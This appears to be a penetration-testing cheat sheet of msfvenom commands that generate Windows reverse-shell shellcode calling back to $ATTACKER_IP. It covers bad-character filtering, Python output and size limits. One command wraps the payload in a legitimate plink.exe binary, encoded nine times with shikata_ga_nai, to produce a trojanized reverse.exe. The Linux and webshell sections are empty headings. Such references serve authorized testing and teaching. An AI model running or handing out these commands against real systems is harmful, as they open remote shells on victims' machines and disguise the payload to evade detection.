Generate shellcodes

Windows

msfvenom -a x86 --platform Windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT
msfvenom -p windows/shell_reverse_tcp -f exe \
    -e x86/shikata_ga_nai -i 9 \
    -x /usr/share/windows-binaries/plink.exe -o reverse.exe \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Generate shellcode with specified size in python format

msfvenom -a x86 --platform windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -s $PAYLOAD_SIZE \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    | msfvenom -a x86 --platform Windows -f python -v shellcode

Linux

Reverse shell commands

If netcat is not on the target system:

Webshells

Commands

Last updated

Was this helpful?